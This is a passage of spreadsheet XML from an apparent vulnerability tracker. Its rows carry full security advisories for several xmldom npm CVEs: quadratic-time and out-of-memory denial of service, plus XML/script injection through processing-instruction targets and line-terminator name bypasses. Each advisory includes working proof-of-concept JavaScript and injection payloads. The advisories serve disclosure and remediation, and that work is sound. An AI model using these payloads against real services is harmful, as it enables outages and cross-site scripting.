          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83613</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83614</t>
        </is>
      </c>
      <c r="D1060" s="5" t="inlineStr"/>
      <c r="E1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1060" s="5" t="inlineStr"/>
      <c r="H1060" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1060" s="5" t="inlineStr"/>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr"/>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1060" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1060" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1060" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1060" s="5" t="inlineStr"/>
      <c r="R1060" s="5" t="inlineStr"/>
      <c r="S1060" s="5" t="inlineStr">
        <is>
          <t>## Summary
`xmldom`'s malformed-input **error-recovery path** has two quadratic-time (O(n²)) behaviors that a
single crafted input triggers together, so a tiny, highly compressible document (tens of KB) stalls
the Node.js event loop for multiple seconds. It is reachable from `DOMParser.parseFromString` under
**default options** — i.e. from unauthenticated, network-delivered XML — making this an unauthenticated
denial of service. One of the two behaviors, the `normalize()` adjacent-text merge, is **additionally
reachable programmatically** — via a plain `normalize()` call on a DOM built with adjacent text nodes,
independent of the parser — so its fix must live in `normalize()`, not only in a parser bound.
## Details
### Finding A — `parseElementStartPart` quadratic re-scan
A `&lt;` character is not a delimiter in any tag-parsing state, so `parseElementStartPart` scans
forward character-by-character over any embedded `&lt;` until it reaches the next `&gt;` (or end of
input), then validates the accumulated slice as a tag name and throws `invalid tagName:` on failure.
The main loop catches this, reports an `error`, sets `end = -1`, and recovers by advancing a single
character (`appendText(Math.max(tagStart, start) + 1)`). With a long run of `&lt;` and a distant `&gt;`,
each of the O(n) recovery retries performs an O(n) scan plus an O(n) anchored regex validation over
the growing candidate ⇒ **O(n²)**.
Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):
- `parseElementStartPart` character scan — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L263-L461
- tag-name validation (`setTagName` → throws `invalid tagName`) — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L886-L891
- main-loop `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L234-L242
- single-character recovery fallback — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/sax.js#L247
Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):
- `parseElementStartPart` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L227
- `catch` → `error` + `end = -1` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L202-L208
- recovery fallback — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L213
- `setTagName` validation — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L616-L621
### Finding B — `normalize()` adjacent-text O(K²) merge
`endDocument()` calls `document.normalize()`. For a parent with K adjacent text nodes (produced by
the one-character recovery of Finding A), `normalize()` performs K−1 merges. Each merge does a
`removeChild` — which re-indexes **all** child nodes of the parent (O(K)) — and an `appendData` —
which rebuilds the accumulator string `this.data + text` (O(K)). Total: **O(K²)**.
Well-formed XML cannot produce adjacent text-node siblings *through the parser* (each text run is one
node; comments, CDATA, PIs, and elements sit between runs), so the **parse-path** trigger for Finding B
is the malformed-input recovery that emits single-character text nodes. The same O(K²) merge is,
however, independently reachable via the public `normalize()` API on a programmatically built tree
(see "Finding B is additionally reachable programmatically" below).
Code (0.9.x, `bb7a085dc5ba1eea3212388509b97bb4b4af32b9`):
- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L418-L420
- `normalize()` adjacent-text merge — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1336-L1356
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L1788-L1798
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L2786-L2790
Code (0.8.x, `e5c14802592685bb872c042c54c3f73758875c85`):
- `endDocument` → `normalize()` — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L213-L214
- `normalize()` merge — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L529-L549
- `removeChild` re-index-all branch — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L756-L773
- `appendData` string rebuild — https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1533
### Finding B is additionally reachable programmatically (no parser involved)
`Node.prototype.normalize()` is public API on every `Document`/`Element`. A tree built entirely through
the ordinary DOM API — `new DOMImplementation().createDocument(...)`, then K× `createTextNode` +
`appendChild` on one parent — reaches the **same** O(K²) merge when the application calls `normalize()`,
with **no** parsing and **no** error-recovery. The parser is only *one* of the two callers of the
vulnerable merge:
- the parser's automatic `endDocument()` → `document.normalize()` (the parse-path trigger above), and
- any explicit application call to the public `normalize()` on a tree with adjacent text nodes.
`XMLSerializer` does **not** call `normalize()`, so serializing an un-merged tree is O(total text), not
O(K²); the O(K²) surface is exactly those two `normalize()` callers. Consequently a parser-side bound
alone cannot remediate Finding B — the fix must live in `normalize()`.
## Affected Versions
Both findings are present across the full published `@xmldom/xmldom` history — both
currently-maintained versions (`0.8.x` and `0.9.x`) are affected — and across the retired unscoped
`xmldom` line. Finding B's `normalize()` merge is additionally reachable **programmatically**: a
direct `normalize()` call on a DOM built with adjacent text nodes hits the same O(K²) merge,
independent of the parser — so, unlike Finding A, it does not require the malformed-input recovery
path.
## Proof of Concept
Default `DOMParser`, no options. The input is trivially compressible (`a&lt;` / `a&lt;&gt;` repeated) and
never throws — it is parsed via the recovery path.
```js
const { DOMParser } = require('@xmldom/xmldom');
// Silence the expected `error`-level recovery reports (default handler logs
// them to console.error without throwing; only fatalError throws).
console.error = function () {};
function timeParse(label, xml, mime) {
  const t0 = process.hrtime.bigint();
  new DOMParser().parseFromString(xml, mime); // completes; no exception
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(label + '  bytes=' + Buffer.byteLength(xml) + '  time=' + ms.toFixed(1) + ' ms');
}
for (const N of [4000, 8000, 16000, 32000]) {
  // Finding A: long re-scans, O(n^2) during parse.
  timeParse('A N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
  // Finding B: short re-scans (cheap parse) but K adjacent text nodes -&gt; O(K^2) in normalize().
  timeParse('B N=' + N, '&lt;r&gt;' + 'a&lt;&gt;'.repeat(N) + '&lt;/r&gt;', 'text/html');
  // Combined: ONE input hits both A and B under the default parser.
  timeParse('C N=' + N, '&lt;r&gt;' + 'a&lt;'.repeat(N) + '&lt;/r&gt;', 'text/xml');
}
```
Measured on Node v18.20.8 (absolute ms vary by host; the load-bearing fact is that doubling the
input ~quadruples the time — canonical O(n²)):
Finding A, isolated (`"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`, normalize disabled to isolate the re-scan):
| N | input bytes | `@xmldom/xmldom` 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 2000 | 4007 | 43 ms | 37 ms |
| 4000 | 8007 | 129 ms | 106 ms |
| 8000 | 16007 | 434 ms | 424 ms |
| 16000 | 32007 | 1629 ms | 1611 ms |
Finding B, isolated (`"&lt;r&gt;" + "a&lt;&gt;"×N + "&lt;/r&gt;"`, time attributable to `normalize()`):
| K (N) | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 12007 | 120 ms | 165 ms |
| 8000 | 24007 | 589 ms | 771 ms |
| 16000 | 48007 | 3142 ms | 4448 ms |
| 32000 | 96007 | 12127 ms | 12951 ms |
Combined (default parser, both findings; `"&lt;r&gt;" + "a&lt;"×N + "&lt;/r&gt;"`):
| N | input bytes | 0.9.10 | 0.8.13 |
|--:|--:|--:|--:|
| 4000 | 8007 | 341 ms | 397 ms |
| 8000 | 16007 | 1894 ms | 1641 ms |
| 16000 | 32007 | 4398 ms | 7661 ms |
~32 KB of input → several seconds of single-threaded event-loop stall.
### Finding B via the public `normalize()` API (no parser)
```js
const { DOMImplementation } = require('@xmldom/xmldom');
function timeNormalize(K) {
  const doc = new DOMImplementation().createDocument(null, 'r', null);
  const el = doc.documentElement;
  for (let i = 0; i &lt; K; i++) el.appendChild(doc.createTextNode('x')); // K adjacent text nodes
  const t0 = process.hrtime.bigint();
  doc.normalize();                                    // O(K^2) merge — no parsing involved
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log('K=' + K + '  time=' + ms.toFixed(1) + ' ms');
}
for (const K of [2000, 4000, 8000, 16000, 32000]) timeNormalize(K);
```
Measured on Node v18.20.8 (doubling K ~quadruples the time — O(K²)):
| K | 0.9.10 | 0.8.13 |
|--:|--:|--:|
| 2000 | 5.7 ms | 5.6 ms |
| 32000 | 1263 ms | 1704 ms |
This path is reachable by any application that builds a DOM from attacker-influenced data and calls
`normalize()`, entirely independent of `DOMParser`.
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic work (multiple seconds at tens of KB; larger inputs scale as O(n²)). No
memory blow-up beyond transient strings, no data exposure, no integrity impact. Because XML is
routinely accepted from untrusted sources and parsed with default options, one request can stall a
server. The payloads are highly compressible, so any endpoint accepting compressed XML faces
additional amplification. Finding B is additionally reachable via an explicit `normalize()` call on a
programmatically built DOM (see Proof of Concept), so applications that construct a document from attacker-influenced
data and normalize it are exposed even without parsing.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no** input-size limit and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.
## Fix Applied
Two independent, non-breaking fixes shipped together — each alone leaves the other's quadratic cost dominating the default parse.
Finding A — terminate the malformed tag-name scan at an embedded `&lt;`, so error recovery is linear instead of O(n²). DOM output is unchanged; only the reported error-message text differs (error strings are not a semver contract).
Finding B — merge adjacent text nodes in `normalize()` in O(K) instead of O(K²), which also closes the same slowdown reachable programmatically through a direct `normalize()` call. Both ship on both maintained versions.</t>
        </is>
      </c>
      <c r="T1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83614</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83615</t>
        </is>
      </c>
      <c r="D1061" s="5" t="inlineStr"/>
      <c r="E1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1061" s="5" t="inlineStr"/>
      <c r="H1061" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1061" s="5" t="inlineStr"/>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr"/>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1061" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1061" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1061" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1061" s="5" t="inlineStr"/>
      <c r="R1061" s="5" t="inlineStr"/>
      <c r="S1061" s="5" t="inlineStr">
        <is>
          <t>## Summary
When an element declares a namespace prefix, xmldom copies the entire in-scope namespace map
into a fresh object and keeps that copy on the element while it is open on the parse stack. A
crafted document that nests N elements, each declaring one unique prefix, therefore drives the
parser to hold on the order of N(N+1)/2 = **O(N²) namespace-map entries at its peak**, so a small,
highly compressible input exhausts the heap. Parsing runs under default options on untrusted,
network-delivered XML, so a sub-megabyte payload can OOM-crash the process before any
application-level validation runs — an unauthenticated denial of service.
## Details
`appendElement` performs the copy: `_copy` clones the current namespace map into a fresh object for
each prefix-declaring element, and the copy is retained on that element's parse-stack entry:
```js
if (localNSMap == null) {
    localNSMap = Object.create(null);
    _copy(currentNSMap, (currentNSMap = Object.create(null)));   // full copy of all ancestor prefixes
}
currentNSMap[nsPrefix] = localNSMap[nsPrefix] = value;
...
el.currentNSMap = currentNSMap;   // retained while the element is open on the parse stack
```
https://github.com/xmldom/xmldom/blob/08a22d78e4bc50f12ce9f5090b8d96ee6031ac7b/lib/sax.js#L467-L540
The copies stack: the element at depth `i` copies a map of size ~`i`, and every ancestor stays live
on the parse stack until it closes, so at the deepest point Σ`i` namespace entries are held at once.
That peak is transient — the completed DOM retains only O(N), one small namespace map per node — but
it is reached during parsing, which is what OOM-crashes the process.
## Proof of Concept
A minimal document — N nested elements, each declaring one unique namespace prefix (no SAML wrapper
needed):
```js
const { DOMParser } = require('@xmldom/xmldom');
function build(n) {
  let open = '', close = '';
  for (let i = 0; i &lt; n; i++) { open += `&lt;a xmlns:p${i}="urn:${i}"&gt;`; close = '&lt;/a&gt;' + close; }
  return `&lt;r&gt;${open}${close}&lt;/r&gt;`;   // &lt;r&gt;&lt;a xmlns:p0="urn:0"&gt;...&lt;a xmlns:p{n-1}="urn:{n-1}"&gt;...&lt;/a&gt;...&lt;/r&gt;
}
for (const n of [2000, 4000, 8000, 16000]) {
  const src = build(n);
  new DOMParser().parseFromString(src, 'text/xml');   // peak memory ~ O(n^2)
  console.log(n, (src.length / 1024).toFixed(0) + ' KB in', (process.resourceUsage().maxRSS / 1024).toFixed(0) + ' MB peak RSS');
}
```
Measured on Node.js v24 (peak RSS ~quadruples per doubling of depth; absolute numbers vary by host):
| depth  | input   | peak RSS                        |
| -----: | ------: | ------------------------------- |
|  2,000 |  56 KB  | 266 MB                          |
|  4,000 | 115 KB  | 622 MB                          |
|  8,000 | 232 KB  | 1.9 GB                          |
| 16,000 | ~470 KB | OOM crash (default ~4 GB heap)  |
About 470 KB of trivially-generated, highly-compressible input crashes a default Node.js process;
larger depths scale as O(N²) into the tens of GB, crashing larger hosts (as first measured by the
reporter with a SAML-shaped payload).
## Impact
Unauthenticated denial of service against any service that parses attacker-influenced XML with
xmldom under default options. A single sub-megabyte request drives multi-gigabyte peak memory and
can OOM-crash the process before any application-level validation (e.g. schema checks or a SAML
signature verification) runs. The payload is a plain namespace-nesting document and highly
compressible, so it is effective over compressed transports (e.g. an HTTP-Redirect / DEFLATE
binding, not only POST bindings).
## Severity note
The CVSS 4.0 vector scores availability only (`VC:N/VI:N/VA:H`): the flaw neither discloses nor
alters data, it exhausts the heap. `VA:H` is justified because a single unauthenticated,
network-delivered request (`AV:N/PR:N/UI:N`) of trivial complexity (`AC:L/AT:N`) drives the parser
to multi-gigabyte peak memory and OOM-crashes the process before any application-level logic runs —
a full loss of availability for the affected service.
## Fix Applied
Inherit each element's in-scope namespace map through the prototype chain instead of copying it for every prefix-declaring element, so a deeply namespaced document holds O(N) namespace entries instead of O(N²) at peak. Behavior-preserving: serialized output is byte-identical, only the memory cost drops. Non-breaking and independent of `requireWellFormed`; ships on both maintained versions.</t>
        </is>
      </c>
      <c r="T1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83615</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83616</t>
        </is>
      </c>
      <c r="D1062" s="5" t="inlineStr"/>
      <c r="E1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1062" s="5" t="inlineStr"/>
      <c r="H1062" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1062" s="5" t="inlineStr"/>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr"/>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom, npm:xmldom</t>
        </is>
      </c>
      <c r="M1062" s="5" t="inlineStr">
        <is>
          <t>0.8.15, 0.9.12</t>
        </is>
      </c>
      <c r="N1062" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1062" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1062" s="5" t="inlineStr"/>
      <c r="R1062" s="5" t="inlineStr"/>
      <c r="S1062" s="5" t="inlineStr">
        <is>
          <t>## Summary
`Document.createProcessingInstruction()` in `@xmldom/xmldom` performs no validation on the `target` parameter. The `requireWellFormed: true` serializer option validates only for `:` in the target and a case-insensitive `xml` prefix, but does not check for `&gt;` characters. A `&gt;` in the target breaks the processing instruction boundary (`&lt;?...?&gt;`), allowing injection of arbitrary content into the serialized XML output.
## Details
`Document.createProcessingInstruction(target, data)` at `lib/dom.js` around line 2413 accepts any string as the `target` parameter and stores it on the PI node without validation.
During serialization, the `requireWellFormed` code path (around line 3286) performs two checks on PI targets:
1. Rejects targets containing `:` (namespace prefix check)
2. Rejects targets matching `xml` case-insensitively (reserved prefix)
However, it does NOT validate that the target conforms to the XML Name production, and critically does NOT check for `&gt;` characters. Since processing instructions are serialized as `&lt;?target data?&gt;`, a `&gt;` in the target prematurely closes the PI, causing the remaining content to be interpreted as document content by any downstream XML parser.
### Root Cause
1. `createProcessingInstruction()` performs no validation on `target`
2. The serializer's `requireWellFormed` check is incomplete -- it only checks for `:` and `xml`, missing characters that break PI syntax (`&gt;`, `?`, whitespace)
3. The serializer emits the target verbatim: `&lt;?${target} ${data}?&gt;`
## Proof of Concept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const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
//
// The &gt; in the target closes the PI prematurely.
// A downstream XML parser sees:
//   - Processing instruction: &lt;?a?&gt;  (target "a", no data)
//   - Text content: " data?&gt;"
//
// requireWellFormed: true did NOT prevent the injection.
```
### Injecting elements via PI target
```javascript
const pi2 = doc.createProcessingInstruction(
  'a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b',
  ''
);
doc.documentElement.appendChild(pi2);
const output2 = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output2);
// Output includes:
//   &lt;?a?&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;?b ?&gt;
//
// The injected &lt;script&gt; element is valid XHTML that a browser would execute.
```
## Impact
Applications that create processing instructions with user-controlled target strings and serialize the result are vulnerable to XML injection. This enables:
- **XML structure injection**: Breaking the PI boundary to inject arbitrary elements, text, or additional processing instructions into the output
- **XSS via XHTML**: If the serialized output is served as XHTML or processed by a browser-based XML parser, injected script elements will execute
- **XXE chain**: Injected DOCTYPE declarations or entity references could trigger XXE in downstream XML parsers that consume the output
- **requireWellFormed bypass**: The existing well-formedness checks are incomplete and provide a false sense of security
## Fix Applied
Under `requireWellFormed`, the serializer validates a processing-instruction target as an XML `NCName` (a `Name` with no colon) and rejects a case-insensitive `xml`, throwing `InvalidStateError` when the target is ill-formed — so a `&gt;`, `?`, or whitespace in the target is now refused.\
On 0.9.12 this replaces an earlier check that already rejected a colon or `xml`, so the no-colon rule is preserved.\
0.8.15 had no processing-instruction target check at all, so the whole target validation is new there.\
Non-breaking and opt-in.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 Default path: emits the ill-formed target verbatim.
console.log(serializer.serializeToString(doc));
// Output: &lt;root&gt;&lt;?a&gt; data?&gt;&lt;/root&gt;
// Opt-in path: the target check now rejects the break-out character.
try {
  serializer.serializeToString(doc, { requireWellFormed: true });
} catch (e) {
  console.log(e.name); // InvalidStateError
}
```
### Why the default stays verbatim
W3C DOM Parsing's require-well-formed flag defaults to false, and the browser `XMLSerializer` emits the target verbatim in that default mode. Unconditionally throwing on an ill-formed PI target would diverge from that platform behavior and would be an unjustified breaking change, so the stricter validation is gated behind `{ requireWellFormed: true }`. (See the [W3C XML Name production](https://www.w3.org/TR/xml/#NT-Name) and [XML Processing Instructions](https://www.w3.org/TR/xml/#sec-pi).)
### Residual limitation
The default serialization path still emits the ill-formed target verbatim -- only the opt-in `requireWellFormed` path is protected. Creation-time validation of the `target` in `createProcessingInstruction()` is breaking and is deferred to the next breaking release, tracked at [xmldom/xmldom#1073](https://github.com/xmldom/xmldom/issues/1073).</t>
        </is>
      </c>
      <c r="T1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83616</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83617</t>
        </is>
      </c>
      <c r="D1063" s="5" t="inlineStr"/>
      <c r="E1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1063" s="5" t="inlineStr"/>
      <c r="H1063" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1063" s="5" t="inlineStr"/>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr"/>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1063" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1063" s="5" t="inlineStr"/>
      <c r="R1063" s="5" t="inlineStr"/>
      <c r="S1063" s="5" t="inlineStr">
        <is>
          <t>## Summary
An embedded line terminator bypasses the `requireWellFormed` serializer check for element and
attribute names. The check was added to fix GHSA-w2rr-34g9-rvrj and GHSA-4w3w-2rp5-g8jm; a name whose
first line is well-formed slips past it and is serialized verbatim, so the characters after the line
terminator break out of the start/end tag or attribute. Callers who enabled `requireWellFormed`
specifically to neutralize those name-injection issues remain exposed.
## Details
xmldom builds every grammar production through a shared regexp builder that compiles with the `m`
flag. The anchored full-string matcher used for element and attribute names, `QName_exact =
reg('^', QName, '$')`, therefore inherits `m`. When it is applied as `QName_exact.test(name)` against
an already-assembled node name, the `m` flag makes `$` match at an interior line terminator, so the
matcher accepts any value in which **at least one line** is a valid `QName`; the other lines are never
constrained. A payload whose first line is a valid `QName`, followed by a line terminator and breakout
markup, is what yields a working injection.
The serializer emits the accepted name verbatim into element start/end tags and attribute names, so
the bytes after the line terminator break out of the intended syntactic position. The check is
reached whenever a caller serializes, with `requireWellFormed: true`, a node whose name was set
through programmatic DOM construction (`createElement`, `createElementNS`, `createAttribute`,
`createAttributeNS`) with attacker-influenced input.
### Root Cause
1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. A full-string validator built on such a production (`.test()`) accepts any string with one
   conforming line, so a line terminator followed by breakout markup passes.
The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
## Proof of Concept
```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
// Element name carrying an embedded line terminator + breakout markup:
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);
// Caller opted into well-formed serialization, expecting invalid names to be rejected:
console.log(new XMLSerializer().serializeToString(doc, { requireWellFormed: true }));
// Observed on the affected version: NO throw; the output contains the injected `&gt;&lt;script&gt;…`
// breakout, because the name's first line ("a") satisfies the m-anchored QName check.
// Expected: InvalidStateError (the name is not a valid XML QName).
// Control — a single-line invalid name IS correctly rejected, proving the check is active and
// that only the line terminator defeats it:
const ctrl = new DOMImplementation().createDocument(null, 'root', null);
ctrl.documentElement.appendChild(ctrl.createElement('a b'));
new XMLSerializer().serializeToString(ctrl, { requireWellFormed: true });
// =&gt; throws InvalidStateError: The element name "a b" is not a valid XML QName
```
## Impact
- **Bypass of a previously shipped security mitigation.** Applications that adopted
  `requireWellFormed: true` specifically to neutralize GHSA-w2rr-34g9-rvrj / GHSA-4w3w-2rp5-g8jm
  remain exposed to element/attribute name injection.
- **XML / markup structure injection**, and, where the serialized output is placed into an HTML
  context, downstream XSS.
## Fix Applied
The anchored XML `Name`/`QName` validators used by the `requireWellFormed` serializer no
longer treat interior line terminators as satisfying the anchors, so a name is validated against the
whole string. A name containing a line terminator is rejected with `InvalidStateError`, closing the
bypass for element and attribute names. The default serialization path is unchanged.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```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMImplementation().createDocument(null, 'root', null);
const el = doc.createElement('a\n&gt;&lt;script&gt;alert(1)&lt;/script');
doc.documentElement.appendChild(el);
// Default path (require-well-formed off) — unchanged, still emits the name verbatim,
// so the `&gt;&lt;script&gt;…` bytes break out of the start tag:
new XMLSerializer().serializeToString(doc);
// Opted-in path — now rejected:
new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError: The element name "a\n&gt;&lt;script&gt;alert(1)&lt;/script" is not a valid XML QName
```
### Why the default stays verbatim
The W3C DOM Parsing require-well-formed flag defaults to false, and browser `XMLSerializer` emits
names verbatim when it is unset. Throwing unconditionally would be an unjustified breaking change, so
the check stays gated on the caller opting in with `{ requireWellFormed: true }`.
### Residual limitation
The default serialization path (no `requireWellFormed`) still emits names verbatim by design (above).
Names introduced through `createElement` / `setAttribute` are never validated at creation — those APIs
store the name unchecked by design — so the opt-in serializer check remains the only guard on that
path.</t>
        </is>
      </c>
      <c r="T1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83617</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83618</t>
        </is>
      </c>
      <c r="D1064" s="5" t="inlineStr"/>
      <c r="E1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1064" s="5" t="inlineStr">
        <is>
          <t>0.9.12</t>
        </is>
      </c>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1064" s="5" t="inlineStr"/>
      <c r="R1064" s="5" t="inlineStr"/>
      <c r="S1064" s="5" t="inlineStr">
        <is>
